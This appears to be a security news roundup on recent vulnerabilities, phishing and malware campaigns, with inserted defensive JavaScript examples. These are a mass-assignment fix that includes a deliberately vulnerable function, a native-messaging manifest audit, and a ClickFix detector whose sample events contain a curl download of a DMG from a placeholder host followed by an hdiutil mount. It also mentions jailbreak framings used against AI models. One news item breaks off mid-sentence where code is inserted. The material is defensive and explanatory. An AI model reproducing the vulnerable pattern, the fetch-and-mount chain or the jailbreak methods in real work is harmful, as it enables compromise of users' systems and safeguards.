It’s chaos in the wild once more.
This week carries that all-too-familiar scent of production systems ablaze and nobody eager to fess up about who left the gate ajar — legacy credentials still functioning, trusted applications pulling shady stunts, browser-based tricks leaping past defenses, and so-called “normal” workflows morphing into phishing conduits because apparently email alone wasn’t a sufficient nightmare.
The most frustrating aspect is how low-cost some of these attacks feel. Nothing sophisticated. Nothing straight out of a movie. Just recycled secrets, counterfeit updates, careless trust, and unmonitored machines quietly being repurposed as someone else’s computing power. Same internet, brand-new migraine. Let’s break it down.
-
Privacy-first bot defense
Cloudflare has joined forces with Google Chrome, Microsoft Edge, and Mozilla Firefox to develop a privacy-focused protocol that websites can adopt to distinguish legitimate human web traffic from unwanted network requests. This initiative leverages Private Access Control Tokens (PACT), which enable websites to issue anonymous tokens confirming that a particular browsing session is being operated by an actual person. “A user’s browser can then present these tokens to other sites to verify that a human is behind the interaction, cutting down on the need for frustrating and cumbersome captchas or intrusive tracking mechanisms,” Cloudflare explained. “PACT is architected so that sites cannot exploit it to track or identify users or their browsing behavior.”
-
Six curl CVEs
AISLE reported that it uncovered six vulnerabilities in curl, spanning “classic memory-lifetime flaws to logic errors in how libcurl determines whether a connection, credential, or host identity remains valid.” Among the notable findings is CVE-2026-8932, which permits the library to “reuse an already-established connection even when certain mTLS configuration-related settings had been altered in a way that should have prevented reuse.” AISLE characterized it as the oldest curl vulnerability documented to date, noting that it has been present in releases since curl version 7.7, which debuted on March 22, 2001. The identified issues have been resolved in version 8.21.0.
-
Unauthenticated takeover
A severe security vulnerability has been revealed in self-hosted deployments of Hoppscotch (CVE-2026-50160, CVSS score: 10.0), an open-source API platform, that can lead to total system compromise. Offgrid Security’s autonomous AI security agent, Kiro, has been acknowledged for discovering the flaw. “The POST /v1/onboarding/config endpoint permits an unauthenticated adversary to inject arbitrary InfraConfig keys — including JWT_SECRET and SESSION_SECRET — into the database via mass assignment,” the project maintainers stated. “These keys are absent from the SaveOnboardingConfigRequest DTO definition, but because the NestJS ValidationPipe does not strip extraneous properties, they travel through to the service layer, where Object.entries(dto) iterates over all keys without restriction.” Successful exploitation results in complete server takeover and persistent access that endures even after password resets. OffGrid Security informed The Hacker News that four independent vulnerabilities work in concert to allow an unauthenticated attacker to overwrite the JWT signing key in a single HTTP request, with the attack requiring no credentials whatsoever. The flaw has been patched in hoppscotch-backend version 2026.5.0.
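The mass-assignment pattern described in the advisory is worth seeing in code. The following is an added example, not Hoppscotch's own code: a framework-free sketch of a config-save service that loops over `Object.entries(dto)` exactly as the advisory describes, next to a hardened version that runs an allow-list check before the service layer ever sees the body. The key names (`MAILER_SMTP_HOST`, `GOOGLE_CLIENT_ID`), the in-memory `Map` store, and the request body are all constructed for the demo; only `JWT_SECRET` and `SESSION_SECRET` come from the page.

```javascript
// Added example (not Hoppscotch's code): mass assignment through an
// unfiltered DTO, and an allow-list that stops it.

// Keys the onboarding endpoint is meant to accept (hypothetical names).
const ONBOARDING_ALLOWED_KEYS = new Set(['MAILER_SMTP_HOST', 'GOOGLE_CLIENT_ID']);

// Keys that must never be writable from any HTTP request.
const PROTECTED_KEYS = new Set(['JWT_SECRET', 'SESSION_SECRET']);

// Vulnerable shape: every key in the request body is written to the store
// without restriction, so undeclared keys travel straight through.
function saveConfigVulnerable(store, dto) {
  for (const [key, value] of Object.entries(dto)) {
    store.set(key, value);
  }
  return store;
}

// Validation step modelled on a whitelisting pipe: keep only declared keys,
// refuse protected keys outright, and report everything that was rejected.
function validateOnboardingDto(body) {
  const clean = {};
  const rejected = [];
  for (const [key, value] of Object.entries(body)) {
    const allowed = ONBOARDING_ALLOWED_KEYS.has(key) && !PROTECTED_KEYS.has(key);
    if (!allowed || typeof value !== 'string') {
      rejected.push(key);
      continue;
    }
    clean[key] = value;
  }
  return { clean, rejected };
}

// Hardened shape: validation runs first, and unexpected keys fail the whole
// request instead of being silently dropped, so the attempt is visible.
function saveConfigHardened(store, body) {
  const { clean, rejected } = validateOnboardingDto(body);
  if (rejected.length > 0) {
    throw new Error(`rejected unexpected config keys: ${rejected.join(', ')}`);
  }
  for (const [key, value] of Object.entries(clean)) {
    store.set(key, value);
  }
  return store;
}

// Constructed request body: one legitimate key plus two undeclared secrets.
const SAMPLE_BODY = {
  MAILER_SMTP_HOST: 'smtp.example.invalid',
  JWT_SECRET: 'value-from-request',
  SESSION_SECRET: 'value-from-request',
};

function freshStore() {
  return new Map([['JWT_SECRET', 'original-server-secret']]);
}

function demo() {
  const leaked = saveConfigVulnerable(freshStore(), SAMPLE_BODY);
  console.log('vulnerable JWT_SECRET now:', leaked.get('JWT_SECRET'));
  try {
    saveConfigHardened(freshStore(), SAMPLE_BODY);
  } catch (e) {
    console.log('hardened:', e.message);
  }
}

if (typeof require !== 'undefined' && require.main === module) demo();
```

In a real NestJS service the equivalent of `validateOnboardingDto` is `new ValidationPipe({ whitelist: true, forbidNonWhitelisted: true })`, which strips properties that are not decorated on the DTO class and rejects the request when any are present; the explicit `PROTECTED_KEYS` check is a second, defence-in-depth guard in the service layer for keys that must never be request-controlled regardless of how the pipe is configured.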
-
Proxyware in smart TVs
A fresh report from Spur Intelligence has exposed that over one-third of LG and Samsung smart TV applications it examined include proxyware capable of relaying third-party traffic through the TV owner’s internet connection with users’ permission. The firm disclosed that it scanned 6,038 apps across LG webOS and Samsung Tizen and identified 2,058 that harbor residential proxy software. This encompasses clocks, screensavers, games, virtual fish tanks, and other low-utility applications. On LG webOS, 42.5% of apps carried such code. On Samsung Tizen, the figure stood at 26.9%. Across both platforms, the combined rate hit 34.1%. Bright Data, Massive, and Oxylabs rank as the top three SDK providers for webOS and Tizen. “Smart TVs are nearly perfect proxy hosts. They reside on the same home network as every other device, yet they don’t register as computers, so people seldom scrutinize them the way they would a computer,” Spur noted. “There’s no battery drain to catch attention, no cellular bill to spike, no app switcher filled with suspicious background activity. A television can remain powered on, logged in, and online for years while its owner treats it as mere furniture.” The threat intelligence company noted that this dynamic also reshapes the consent landscape, as users may not grasp what it truly means to sell access to their residential IP address. “From a technical standpoint, these applications comply with obtaining consent based on how they notify the user,” Spur CTO Alastair Parr told The Hacker News. “However, there is frequently no verification that the user is of legal age or authorized to grant consent on the device. The reality is that there are likely many smart TVs scattered across office environments and private homes, quietly participating in these networks, without the knowledge or approval of the responsible owners.” Amazon’s Device and System Abuse Policy explicitly prohibits apps that facilitate proxy services for third parties. Similar safeguards have been enacted by Roku as well. Nevertheless, LG and Samsung have yet to implement a comparable policy.
-
Edgecution via Teams
An initial access broker (IAB) connected to Payouts King ransomware has been detected posing as IT staff in social engineering campaigns carried out through Microsoft Teams to distribute a malicious Microsoft Edge browser extension codenamed Edgecution. “The method employs a malicious Microsoft Edge browser extension that exploits the Chrome native messaging protocol to interface with host-native applications beyond the boundaries of the browser sandbox,” Zscaler ThreatLabz explained. “By abusing this interface, the attackers secure direct host access, empowering them to tamper with the local filesystem, initiate processes, and run arbitrary code on the compromised machine.” The malware comprises two elements: a Microsoft Edge browser extension dubbed “Edge Monitoring Agent” that communicates with a command-and-control (C2) server and relays host-issued commands to a Python-based backdoor, which is capable of harvesting system data, listing active processes, providing filesystem access, and executing arbitrary Python code and shell commands. The extension remains invisible to the user because it operates within a headless Microsoft Edge browser session. A comparable attack sequence
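Native messaging is a legitimate browser feature, so the defensive question is which hosts are registered and whether they look like something IT installed. The following is an added example, not part of the Zscaler write-up: a small audit over native messaging host manifests (the JSON files that Edge and Chrome read to decide which executable an extension may talk to) that flags hosts launched through a script interpreter, hosts living in user-writable directories, and hosts reachable by extension IDs outside an approved list. The manifests, the approved extension ID, and the path heuristics are all constructed or assumed for this demo.

```javascript
// Added example (not from the Zscaler report): audit native messaging host
// manifests for signals a defender would want to review.

// Extension IDs IT has vetted. The value is a hypothetical placeholder.
const APPROVED_EXTENSION_IDS = new Set(['abcdefghijklmnopabcdefghijklmnop']);

// Host executables that are really script interpreters (assumed heuristic).
const INTERPRETER_RE =
  /(^|[\\/])(pythonw?[\w.-]*|powershell|pwsh|cmd|wscript|cscript|node|bash|sh|zsh)(\.exe)?$/i;

// Locations an unprivileged user can write to (assumed heuristic).
const USER_WRITABLE_RE =
  /(\\AppData\\|\\Temp\\|\\Downloads\\|\\Users\\Public\\|^\/tmp\/|^\/home\/|^\/Users\/)/i;

// Extract 32-character extension IDs from "chrome-extension://<id>/" origins.
function extensionIdsFromOrigins(origins) {
  const ids = [];
  for (const origin of origins || []) {
    const m = /^chrome-extension:\/\/([a-p]{32})\/$/.exec(origin);
    if (m) ids.push(m[1]);
  }
  return ids;
}

// Evaluate one parsed manifest and return the reasons it deserves a look.
function auditManifest(manifest) {
  const reasons = [];
  const path = manifest.path || '';
  if (manifest.type !== 'stdio') reasons.push(`unexpected type "${manifest.type}"`);
  if (INTERPRETER_RE.test(path)) reasons.push('host launched via script interpreter');
  if (USER_WRITABLE_RE.test(path)) reasons.push('host binary in user-writable location');
  const ids = extensionIdsFromOrigins(manifest.allowed_origins);
  if (ids.length === 0) reasons.push('no valid allowed_origins');
  for (const id of ids) {
    if (!APPROVED_EXTENSION_IDS.has(id)) reasons.push(`unapproved extension ${id}`);
  }
  return { name: manifest.name, path, suspicious: reasons.length > 0, reasons };
}

function auditManifests(manifests) {
  return manifests.map(auditManifest);
}

// Constructed sample manifests: one vetted corporate host, one that would
// trip every heuristic above.
const SAMPLE_MANIFESTS = [
  {
    name: 'com.corp.sso_bridge',
    description: 'Corporate SSO helper (constructed sample)',
    path: 'C:\\Program Files\\Corp\\sso_bridge.exe',
    type: 'stdio',
    allowed_origins: ['chrome-extension://abcdefghijklmnopabcdefghijklmnop/'],
  },
  {
    name: 'com.monitoring.agent',
    description: 'Monitoring agent (constructed sample)',
    path: 'C:\\Users\\jdoe\\AppData\\Local\\agent\\pythonw.exe',
    type: 'stdio',
    allowed_origins: ['chrome-extension://' + 'p'.repeat(32) + '/'],
  },
];

function demo() {
  for (const r of auditManifests(SAMPLE_MANIFESTS)) {
    console.log(r.suspicious ? 'REVIEW' : 'ok    ', r.name, r.reasons.join('; '));
  }
}

if (typeof require !== 'undefined' && require.main === module) demo();
```

To feed real data in, collect the manifest paths from where the browsers register them: on Windows the default value of each subkey under `HKCU\Software\Microsoft\Edge\NativeMessagingHosts` and `HKLM\Software\Microsoft\Edge\NativeMessagingHosts` (Chrome uses the same layout under `Software\Google\Chrome`), and on Linux the files in `~/.config/microsoft-edge/NativeMessagingHosts/`. A per-user registration pointing at an interpreter in a profile directory is exactly the shape a defender should expect from an extension dropped by social engineering rather than by a software deployment tool.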
-
Legacy credential breach
Competitive intelligence firm Klue disclosed that a credential from a 2022 pilot program was exploited by the Icarus extortion group to steal Salesforce data from its corporate clients, several of which are cybersecurity companies. Klue stated the credential was “originally provided to a third-party in 2022, for a limited pilot,” but did not elaborate on the pilot’s purpose, duration, or the third party’s identity. It remains unclear why the credential wasn’t revoked after the pilot ended or how attackers initially obtained it. Multiple companies, including 8×8, BeyondTrust, Gong, Jamf, HackerOne, Insurity, LastPass, OneTrust, Pendo, Recorded Future, Snyk, Sprout Social, and Tanium, have confirmed limited Salesforce data theft.
-
State-crime convergence
NCC Group reports growing evidence of nation-state actors increasingly using tools and tactics typical of financially motivated cybercrime to mask espionage and intelligence-gathering, blurring the lines between these activities. “Historically, organizations could draw a relatively clear distinction between ransomware attacks driven by financial gain and nation-state operations designed to support strategic objectives. That distinction is becoming increasingly difficult to make,” said Matt Hull, VP of Cyber Intelligence and Response at NCC Group. “What we’re seeing is a convergence of criminal and state-backed activity. Threat actors are sharing infrastructure, adopting common tooling, and, in some cases, deliberately operating behind established ransomware brands to obscure attribution and delay response efforts.”
-
Admin reset alerts
Google is expanding its “Super Admin password reset” alert in Alert Center to a broader Admin password reset alert. “Previously, this rule only triggered alerts when a super admin’s password was changed,” the company explained. “With this update, the alert will now cover password resets for all administrator roles within your organization. This update provides admins with better visibility and control over the security of their organization’s privileged accounts. Monitoring password changes for all admin roles provides a higher level of oversight to respond more quickly to potential account compromises or unauthorized changes.” This change applies to all Google Workspace customers.
-
ClickFix targets macOS
A new ClickFix campaign tricks users into copying malicious commands and pasting them into the Terminal app, which silently downloads and mounts a malicious DMG file. The disk image contains a self-signed information stealer capable of harvesting system passwords, browser data, wallet information, messaging app data, and Keychain contents, exfiltrating the data, establishing LaunchAgent persistence, and tampering with Ledger Live and Trezor Suite installations by replacing legitimate components to hijack cryptocurrency wallet data. According to Palo Alto Networks Unit 42, this stealer belongs to the Atomic macOS Stealer (AMOS) lineage, specifically a variant called Odyssey. This development follows the cybersecurity firm’s report on another multi-step ClickFix attack using techniques like brandsquatting to deliver a cross-platform trojan with capabilities including browser credential theft, remote shell access, live screen streaming, keylogging, file management, and SSH tunneling.
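The chain the campaign relies on has a distinctive process lineage: a shell spawned by Terminal fetches a file and then `hdiutil` mounts it moments later. The following is an added example, not Unit 42's detection content: a lineage-based check over process-start events that raises an alert when a download tool and an `hdiutil attach`/`mount` run on the same tty, under a Terminal ancestor, within a short window. The events, the field names (`ts`, `pid`, `ppid`, `exe`, `args`, `tty`), and the window length are constructed or assumed; map the fields onto whatever your EDR or `eslogger` output provides.

```javascript
// Added example (not from Unit 42): detect "pasted into Terminal, fetched,
// then mounted" process lineage from constructed process-start events.

const WINDOW_SECONDS = 120;                         // assumed window
const DOWNLOADERS = new Set(['/usr/bin/curl']);      // extend for your fleet
const TERMINAL_APPS = new Set(['Terminal', 'iTerm2']);

const basename = (p) => p.split('/').pop();

function isDownloader(ev) {
  return DOWNLOADERS.has(ev.exe);
}

function isMount(ev) {
  return ev.exe === '/usr/bin/hdiutil' && /^(attach|mount)$/.test(ev.args[0] || '');
}

// Walk the ppid chain and report whether a terminal emulator is an ancestor.
function descendsFromTerminal(ev, byPid) {
  const seen = new Set();
  let cur = byPid.get(ev.ppid);
  while (cur && !seen.has(cur.pid)) {
    if (TERMINAL_APPS.has(basename(cur.exe))) return true;
    seen.add(cur.pid);
    cur = byPid.get(cur.ppid);
  }
  return false;
}

function detectClickFix(events) {
  const byPid = new Map(events.map((e) => [e.pid, e]));
  const sorted = [...events].sort((a, b) => a.ts - b.ts);
  const alerts = [];
  for (const mountEv of sorted.filter(isMount)) {
    if (!descendsFromTerminal(mountEv, byPid)) continue;
    const download = sorted.find(
      (e) => isDownloader(e) && e.tty === mountEv.tty &&
             e.ts <= mountEv.ts && mountEv.ts - e.ts <= WINDOW_SECONDS,
    );
    if (download) {
      alerts.push({
        tty: mountEv.tty,
        download: download.args.join(' '),
        mount: mountEv.args.join(' '),
      });
    }
  }
  return alerts;
}

// Constructed events. Session ttys000 shows the suspicious chain; the Finder
// mount and the lone hdiutil on ttys001 are benign and must not alert.
const TERMINAL = '/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal';
const FINDER = '/System/Library/CoreServices/Finder.app/Contents/MacOS/Finder';
const SAMPLE_EVENTS = [
  { ts: 1000, pid: 100, ppid: 1,   exe: TERMINAL,           args: [], tty: 'ttys000' },
  { ts: 1001, pid: 101, ppid: 100, exe: '/bin/zsh',         args: ['-l'], tty: 'ttys000' },
  { ts: 1030, pid: 102, ppid: 101, exe: '/usr/bin/curl',    args: ['-fsSL', 'https://example.invalid/update.dmg', '-o', '/tmp/update.dmg'], tty: 'ttys000' },
  { ts: 1032, pid: 103, ppid: 101, exe: '/usr/bin/hdiutil', args: ['attach', '/tmp/update.dmg'], tty: 'ttys000' },
  { ts: 1100, pid: 200, ppid: 1,   exe: FINDER,             args: [], tty: '' },
  { ts: 1105, pid: 201, ppid: 200, exe: '/usr/bin/hdiutil', args: ['attach', '/Users/jdoe/Downloads/installer.dmg'], tty: '' },
  { ts: 1200, pid: 300, ppid: 100, exe: '/bin/zsh',         args: ['-l'], tty: 'ttys001' },
  { ts: 1210, pid: 301, ppid: 300, exe: '/usr/bin/hdiutil', args: ['attach', '/Users/jdoe/Desktop/tools.dmg'], tty: 'ttys001' },
];

if (typeof require !== 'undefined' && require.main === module) {
  console.log(JSON.stringify(detectClickFix(SAMPLE_EVENTS), null, 2));
}
```

The tty join is what keeps the rule precise: Terminal sessions are long-lived, so matching on the ancestor alone would pair an unrelated `curl` from one tab with a manual mount in another. Tune `WINDOW_SECONDS` to how long your users take to paste and run, and keep the benign cases in the sample as regression fixtures when you adjust the rule.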
-
TfL hackers convicted
Thalha Jubair, 20, from East London, and Owen Flowers, 18, from Walsall, were convicted in the U.K. for orchestrating a 2024 cyber attack on Transport for London (TfL) that caused $38.2 million in losses. The two, members of the online criminal group Scattered Spider, were arrested last September but pleaded not guilty during a November 2025 court appearance. Sentencing is scheduled for July 16, 2026. “Scattered Spider is a prolific criminal group that engages in data extortion and other criminal activities, utilizing social engineering techniques and SIM swap attacks, to obtain credentials, install remote access tools, and/or bypass multi-factor authentication,” the U.S. Federal Bureau of Investigation (FBI) stated.
-
Marketplace admin extradited
Abdellah Belmili (aka Dila Belmili or SPOX), a 26-year-old Algerian national, has been arrested, charged, and extradited from Spain to the U.S. on conspiracy to commit bank fraud charges. SPOX allegedly administered a cybercrime marketplace (“www.market0day[.]com”) and created phishing kits used to compromise major U.S. financial institutions. “Between September and November 2020, Belmili advertised the marketplace and facilitated some of the customer support for the marketplace on his personal Telegram channel @SpoxCoder,” the U.S. Justice Department said. “In late December 2020, after several customers complained that they had not received their purchases from www.market0day[.]com, Belmili replied that he was no longer the administrator, and instead had opened up a new marketplace – www.spoxy[.]us, advertising the new marketplace as a ‘new store for bulk SMS.’ ‘Bulk SMS’ typically refers to sending phishing or other fraudulent messages via text message.” Approximately 5,600 U.S. and international victims have been identified.
-
Collaboration phishing
A new phishing campaign abuses Outlook Groups and Microsoft 365 collaboration features to “make malicious activity appear routine,” according to Fortra. The attack involves adding targets to an attacker-controlled Microsoft 365 group, then using the group mailbox, shared files, or fake calendar invites (CalPhishing) to facilitate credential theft, token capture, or malware delivery. “The technique shifts malicious intent away from a single phishing email into a trusted productivity workflow,” the company explained. “A user may see what looks like a normal group addition, internal update, shared resource, or calendar item before being pushed toward an action.”
-
AI in cybercrime
The use of artificial intelligence in cybercrime is increasing, with threat actors using the technology to craft more convincing phishing lures, automate attacks, and evade detection. This trend is expected to persist as AI tools become more accessible and advanced.
-
AI in the cybercrime underground
A fresh report from Sophos shows that artificial intelligence has become a fiercely debated subject in hacker forums, with cybercriminals weighing its usefulness for building malware and attack tools, while others worry it could shrink job opportunities in their illicit trade. The discussions range from listings selling API keys for generative AI platforms, to services advertising AI-powered social engineering boosts, to AI-driven malware families such as ApexAI, Metatron, and PolyEngine. Actors are also sharing methods to jailbreak publicly available AI models — using role-play framing, multi-turn prompting, and contextual manipulation to sidestep content filters and other protections — along with recruitment offers for prompt engineers. Underground users have additionally talked about leveraging public AI assistants for intrusion operations, and have promoted a tool dubbed Leak Bazaar that allegedly uses AI to sort through massive volumes of stolen data before it gets packaged and traded to other threat actors. Still, adoption isn’t universal; some have voiced doubt and anxiety that AI could “reshape roles, pricing, and competitive advantage within the cybercrime economy.”
-
8,500 REDCap instances exposed
Censys identified slightly more than 8,500 internet-facing REDCap instances worldwide as of June 16, 2026, with the largest concentrations in the U.S., the U.K., Germany, and Australia. REDCap — which stands for Research Electronic Data Capture — is a web-based platform widely used by research organizations to manage clinical trial data, participant records, and other sensitive study information. Last week, Google’s Threat Intelligence Group (GTIG) linked an espionage campaign lasting over a year — targeting academic, medical, and military research entities across North America — to a China-connected group tracked as UNC6508. The attackers used publicly accessible REDCap servers as their entry point to drop a backdoor named INFINITERED, designed to siphon sensitive data. The precise method of compromise remains unconfirmed, with the earliest known breach traced back to September 2023.
-
Surveillance export gaps
A Human Rights Watch investigation has exposed that Circles, a Bulgaria-based surveillance technology company, sold its products to governments likely to deploy them for repression or serious human rights abuses. Export licensing records show authorizations for Circles’ technology sent to Azerbaijan, Bahrain, Brazil, the Dominican Republic, El Salvador, Ghana, Guatemala, Israel, Jordan, Malaysia, Mexico, Morocco, Panama, Serbia, and the U.A.E. Buyers included intelligence agencies, military and police organizations, regional authorities, and private-sector firms, according to the watchdog. It remains unclear whether the technology was actually shipped. “Nonetheless, issuing the licenses demonstrates a major flaw in how individual governments implement E.U. export controls for surveillance technology,” the organization stated. “The controls are intended to limit exports of surveillance technology to destinations where there is a likelihood it could be used to violate rights, and to provide transparency about what exports take place.”
-
BitB phishing lures
An ongoing campaign impersonating well-known software brands has adopted the Browser-in-the-Browser (BitB) technique to deliver malicious payloads through a reusable phishing kit. The attack employs a draggable pop-up window with a forged URL to display a counterfeit software update alert. “The campaign uses social engineering to trick victims into downloading and manually executing a malicious installer (e.g., an .exe payload),” Unit 42 explained. “The pages simulate a stalled document load and present an ‘out of date’ software error.” Earlier this month, Unit 42 revealed a second BitB campaign spanning at least 10 distinct domains that harvested Microsoft 365 credentials via a draggable, OS- and browser-fingerprinted pop-up featuring a spoofed OAuth URL. In that scheme, victims who clicked a Microsoft sign-in button were shown what looked like a standard login portal built to capture their credentials.
If there’s a unifying theme, it’s that attackers don’t need sophisticated exploits when the basics still work — forgotten credentials, blind trust, fake update prompts, exposed admin paths, and users being coaxed into doing the dangerous part themselves. The future is here, somehow, and it still smells like a neglected staging server.
Apply patches wherever possible. Revoke what you’ve overlooked. Maybe take a second look at the devices you’ve been treating like furniture. See you next ThreatsDay — assuming the internet hasn’t found an even more absurd way to set itself on fire by then.